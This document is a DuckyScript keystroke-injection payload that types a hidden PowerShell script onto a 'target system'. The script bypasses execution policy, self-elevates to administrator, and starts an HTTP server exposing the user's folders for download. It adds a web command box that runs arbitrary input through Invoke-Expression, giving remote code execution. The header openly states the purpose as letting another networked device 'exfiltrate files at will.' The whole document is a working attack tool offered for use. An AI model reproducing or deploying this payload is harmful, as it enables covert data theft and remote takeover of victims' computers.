REM Title: beigeworm's USER folder Host.
REM Author: @beigeworm
REM Description: This script hosts the User directory to the machines ip address so another device on the network can browse and exfiltrate files at will.
REM Features a powershell command input box with output window!

REM SETUP INSTRUCTIONS
REM Run the script on target system
REM (this Script will prompt for admin to enable opening port 8080 on the machine)
REM The console window will setup the server and provide a URL.
REM Use the given URL in a browser on another device on the same network
REM Browse files and download at will.
REM (The Root folder will be the folder the script is ran in.)

REM some setup for dukie script
DEFAULT_DELAY 100

GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 4000
STRING $Host.UI.RawUI.BackgroundColor = "Black";Clear-Host;$width = 88;$height = 30;[Console]::SetWindowSize($width, $height);$windowTitle = "HTTP File Server";[Console]::Title = $windowTitle;Write-Host "================================== Server Setup =======================================" -ForegroundColor Green;Add-Type -AssemblyName PresentationCore,PresentationFramework;Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.Application]::EnableVisualStyles();Write-Host "Checking User Permissions.." -ForegroundColor DarkGray;If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){Write-Host "Admin privileges needed for this script..." -ForegroundColor Red;Write-Host "This script will self elevate to run as an Administrator and continue." -ForegroundColor DarkGray;Write-Host "Sending User Prompt."  -ForegroundColor Green;$fpath = $env:HOMEDRIVE;$fpath | Out-File -FilePath "$env:temp/homepath.txt" -Force;sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -ExecutionPolicy Bypass -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;exit}else{sleep 1;if (-Not (Test-Path -Path "$env:temp/homepath.txt")){;$fpath = Read-Host "Input the local path for the folder you want to host ";$fpath | Out-File -FilePath "$env:temp/homepath.txt"}}Write-Host "Detecting primary network interface." -ForegroundColor DarkGray;$networkInterfaces = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'Virtual' };$filteredInterfaces = $networkInterfaces | Where-Object { $_.Name -match 'Wi*' -or  $_.Name -match 'Eth*'};$primaryInterface = $filteredInterfaces | Select-Object -First 1;if($primaryInterface){if($primaryInterface.Name -match 'Wi*'){Write-Output "Wi-Fi is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Wi*" | Select-Object -ExpandProperty IPAddress}elseif($primaryInterface.Name -match 'Eth*'){Write-Output "Ethernet is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Eth*" | Select-Object -ExpandProperty IPAddress}else{Write-Output "Unknown primary internet connection."}}else{Write-Output "No primary internet connection found."}$hpath = Get-Content -Path "$env:temp/homepath.txt";cd "$hpath";$httpsrvlsnr = New-Object System.Net.HttpListener;$httpsrvlsnr.Prefixes.Add("http://"+$loip+":5000/");$httpsrvlsnr.Prefixes.Add("http://localhost:5000/");$httpsrvlsnr.Start();Write-Host "Setting folder root as : $hpath `n";$webroot = New-PSDrive -Name webroot -PSProvider FileSystem -Root $PWD.Path;[byte[]]$buffer = $null;Write-Host "==============================   HTTP SERVER STARTED   ================================" -ForegroundColor Green;Write-Host ("Network Devices Can Reach the server at : http://"+$loip+":5000");Write-Host "`n";rm -Path "$env:temp/homepath.txt" -Force;function Format-FileSize{param([long]$Size);$Units = "bytes", "Kb", "Mb", "Gb";$Index = 0;while($Size -ge 1024 -and $Index -lt 4){$Size = $Size / 1024;$Index++}"{0:N2} {1}" -f $Size, $Units[$Index]};Function DisplayWebpage{$html = "<html><head><style>body { font-family: Arial, sans-serif; margin: 30px; background-color: #7c7d71; }h1 { color: #000; }.container { display: flex; align-items: center; }a { color: #000; text-decoration: none; font-size: 16px; padding-left: 10px; }a:hover { text-decoration: underline; }table { border-collapse: collapse; width: 100%; border: 1px solid #ddd; }th, td { padding: 8px; text-align: left; border-bottom: 1px solid #ddd; }tr:hover { background-color: #909090; }thead { background-color: #909090; }ul { list-style-type: none; padding-left: 0; }li { margin-bottom: 5px; }textarea { width: 80%; padding: 10px; font-size: 14px; }input[type='submit'] { position: relative; top: -12px; margin-left: 30px; padding: 10px 20px; background-color: #cf2b2b; color: #FFF; border: none; border-radius: 5px; font-size: 18px; cursor: pointer; }button { background-color: #40ad24; color: #FFF; border: none; padding: 5px 10px; border-radius: 4px; cursor: pointer; }.stop-button { position: relative; top: -5px; font-size: 18px; margin-left: 30px; background-color: #cf2b2b; color: #FFF; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; }pre { background-color: #f7f7f7; padding: 10px; border-radius: 4px; }</style></head><body><div class='container'><h1> Simple HTTP Server</h1><a href='/stop'><button class='stop-button'>STOP SERVER</button></a></div><ul><h3> Root Folder Path : $folderPath </h3><ul><ul><table><thead><tr><th> FOLDERS</th></tr></thead><tbody>";foreach ($file in $files) {$fileUrl = $file.FullName.Replace(' ', '%20') -replace [regex]::Escape($PWD.Path.Replace(' ', '%20')), '';$fileDetails = "<td>$(Format-FileSize $file.Length)</td><td>$($file.Extension)</td><td>$($file.CreationTime)</td><td>$($file.LastWriteTime)</td>";if ($file.PSIsContainer) {$html += "<tr><td><a href='/browse$fileUrl'><button>Open Folder</button></a><a>$file</a></td></tr>"}else{}};$html += "</tbody></table>";$html += "<ul><table>";$html += "<thead><tr><th> FILES</th><th>Size</th><th>Type</th><th>Created</th><th>Last Modified</th></tr></thead><tbody>";foreach ($file in $files) {$fileUrl = $file.FullName.Replace(' ', '%20') -replace [regex]::Escape($PWD.Path.Replace(' ', '%20')), '';$fileDetails = "<td>$(Format-FileSize $file.Length)</td><td>$($file.Extension)</td><td>$($file.CreationTime)</td><td>$($file.LastWriteTime)</td>";if ($file.PSIsContainer){}else {$html += "<tr><td><a href='/download$fileUrl'><button>Download</button></a><a>$file</a></td>$fileDetails</tr>"}};$html += "</tbody></table>";$html += "</ul>";$html += "<h3>Command Input</h3>";$html += "<form method='post' action='/execute'>";$html += "<span><textarea name='command' rows='1' cols='80'></textarea><input type='submit' value='Execute'></span><br>";$html += "</form>";$html += "<h3>Output</h3><pre name='output' rows='10' cols='80'>$output</pre></body></html>";$html += "</body></html>";$buffer = [System.Text.Encoding]::UTF8.GetBytes($html);;$ctx.Response.ContentLength64 = $buffer.Length;;$ctx.Response.OutputStream.WriteAsync($buffer, 0, $buffer.Length)}while ($httpsrvlsnr.IsListening){try {$ctx = $httpsrvlsnr.GetContext();if ($ctx.Request.RawUrl -eq "/") {$files = Get-ChildItem -Path $PWD.Path -Force;$folderPath = $PWD.Path;DisplayWebpage}elseif ($ctx.Request.RawUrl -eq "/stop") {$httpsrvlsnr.Stop();;Remove-PSDrive -Name webroot -PSProvider FileSystem;}elseif ($ctx.Request.RawUrl -match "^/download/.+") {$filePath = Join-Path -Path $PWD.Path -ChildPath ($ctx.Request.RawUrl.Replace('%20', ' ') -replace "^/download", "");if ([System.IO.File]::Exists($filePath)) {$fileInfo = Get-Item -Path $filePath;$ctx.Response.ContentType = 'application/octet-stream';$ctx.Response.ContentLength64 = $fileInfo.Length;$fileStream = [System.IO.File]::OpenRead($filePath);$buffer = New-Object byte[] 4096;$totalBytesRead = 0;while ($totalBytesRead -lt $fileInfo.Length) {$bytesRead = $fileStream.Read($buffer, 0, $buffer.Length);$ctx.Response.OutputStream.Write($buffer, 0, $bytesRead);$ctx.Response.OutputStream.Flush();$totalBytesRead += $bytesRead;$progressPercentage = [Math]::Round(($totalBytesRead / $fileInfo.Length) * 100, 0);Write-Progress -Activity "Downloading $($fileInfo.Name)" -Status "$progressPercentage% Complete" -PercentComplete $progressPercentage;if ($totalBytesRead -eq $fileInfo.Length) {Write-Progress -Activity "Downloading $($fileInfo.Name)" -Completed}}Write-Host "A User Downloaded : $filePath" -ForegroundColor Green;$ctx.Response.OutputStream.Close();$fileStream.Close()}}elseif ($ctx.Request.RawUrl -match "^/browse/.+") {$folderPath = Join-Path -Path $PWD.Path -ChildPath ($ctx.Request.RawUrl.Replace('%20', ' ') -replace "^/browse", "");if ([System.IO.Directory]::Exists($folderPath)){$files = Get-ChildItem -Path $folderPath -Force;DisplayWebpage}}elseif($ctx.Request.RawUrl -eq "/execute" -and $ctx.Request.HttpMethod -eq "POST"){$reader = New-Object IO.StreamReader $ctx.Request.InputStream,[System.Text.Encoding]::UTF8;$postParams = $reader.ReadToEnd();$reader.Close();$command = $postParams.Split('=')[1] -replace "%20", " ";$output = Invoke-Expression $command | Out-String;$files = Get-ChildItem -Path $PWD.Path -Force;$folderPath = $PWD.Path;DisplayWebpage}}catch [System.Net.HttpListenerException] {Write-Host ($_);}}
DELAY 500
ENTER